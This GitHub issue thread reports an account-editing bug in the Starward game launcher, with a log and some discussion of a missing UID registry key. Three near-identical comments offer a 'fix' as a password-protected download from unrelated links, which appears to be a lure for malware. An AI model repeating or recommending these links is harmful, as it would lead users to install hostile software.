### ISSUE TITLE
[Bug] 绝区零账号信息无法编辑问题

### ISSUE THREAD

**Issue by cangerjun** [Scighost/Starward#1055]
### Checklist

- [X] My issue was not mentioned by others, and it is not a duplicate issue.

### Description

今天更新的0.13.0版本有了储存功能，但是账号备注无法修改，铅笔图标无法交互.

### Reproduction Steps

1.在更新0.13.0前有使用用绝区零
2.在更新后会出现一个uid为0的账号，就无法编辑。
3.不知道重新登录(安装)绝区零是否还有

### Screenshots

![屏幕截图 2024-08-29 001343](https://github.com/user-attachments/assets/477f341a-589b-4cea-8752-89cdb5cf11a2)
![image](https://github.com/user-attachments/assets/b9e2f879-cd3c-4d95-9ecb-206a79389428)

### Starward Version

0.13.0

### Windows Version

Windows 11 专业版 24H2 26120.1542

### Log

```shell
[00:06:42.417] [INFO] 
Welcome to Starward v0.13.0
System: Microsoft Windows NT 10.0.26120.0
Command Line: F:\Starward\app-0.13.0\Starward.dll

[00:06:42.479] [INFO] Starward.Services.DatabaseService
Database path is 'F:\Starward'

[00:06:42.513] [INFO] Starward.Services.DatabaseService
Database version is 10, target version is 10.

[00:06:42.635] [INFO] Starward.Pages.MainPage
Last game region is hk4e_cn

[00:06:42.704] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[00:06:44.155] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "F:\Genshin Impact Game"

[00:06:44.187] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".

[00:06:44.964] [INFO] Starward.Services.UpdateService
Start to check update (Preview: True, Arch: X64)

[00:06:45.593] [INFO] Starward.Services.UpdateService
Current version: "0.13.0", latest version: "0.13.0", ignore version: null

[00:07:24.876] [INFO] Starward.Pages.MainPage
Change game region to nap_cn

[00:07:24.878] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param nap_cn

[00:07:25.019] [INFO] Starward.Pages.GameLauncherPage
Game install path of nap_cn: "F:\ZenlessZoneZero Game"

[00:07:25.029] [EROR] Starward.Pages.GameLauncherPage
Cannot get game account (nap_cn)
System.InvalidCastException: Unable to cast object of type 'System.Int32' to type 'System.Int64'.
   at Starward.Pages.GameLauncherPage.GameLauncherPage_obj1_Bindings.UpdateTwoWay_14_Text() in D:\a\Starward\Starward\src\Starward\obj\x64\Release\net8.0-windows10.0.22621.0\win10-x64\Pages\GameLauncherPage.g.cs:line 1408
   at ABI.Microsoft.UI.Xaml.DependencyPropertyChangedCallback.Do_Abi_Invoke(IntPtr thisPtr, IntPtr sender, IntPtr dp)
--- End of stack trace from previous location ---
   at WinRT.ExceptionHelpers.<ThrowExceptionForHR>g__Throw|39_0(Int32)
   at ABI.Microsoft.UI.Xaml.Controls.IAutoSuggestBoxMethods.set_Text(IObjectReference, String)
   at Starward.Pages.GameLauncherPage.GameLauncherPage_obj1_Bindings.Update_SelectGameAccount(GameAccount obj, Int32 phase) in D:\a\Starward\Starward\src\Starward\obj\x64\Release\net8.0-windows10.0.22621.0\win10-x64\Pages\GameLauncherPage.g.cs:line 723
   at Starward.Pages.GameLauncherPage.GetGameAccount() in D:\a\Starward\Starward\src\Starward\Pages\GameLauncherPage.xaml.cs:line 524

[00:07:25.231] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of nap_cn is "1.1.0".
```

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by xiaoxingruo** [comment]
我试了，重新登录是没用的，不管是国服还是国际服都是这样，可能只能等作者修了

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Karitsuki** [comment]
我看了一下，保存账号信息那边那个键值缺少“上次登陆UID”的信息，所以无法获取账号的UID

**Comment by Karitsuki** [comment]
以原神为例，原神在注册表中有一个键值“_LastUid_h2153286551"中储存着上次登陆帐号的UID，在ZZZ的同路径下不存在类似的保存UID的键值。
但是保存账号功能应该是有用的，只是无法识别UID。

**Comment by xiaoxingruo** [comment]
> 以原神为例，原神在注册表中有一个键值“_LastUid_h2153286551"中储存着上次登陆帐号的UID，在ZZZ的同路径下不存在类似的保存UID的键值。 保存账号功能应该是有用的，但是因为识别不到UID，所以它以为你这个还是默认的0，才无法编辑【手动狗头】

其实原神如果登录一个新账号的话也是0，UID不会记录在登录器上面，要自己手动改才行，每次新版本他就有概率变回0，每次我都要自己改一次才行
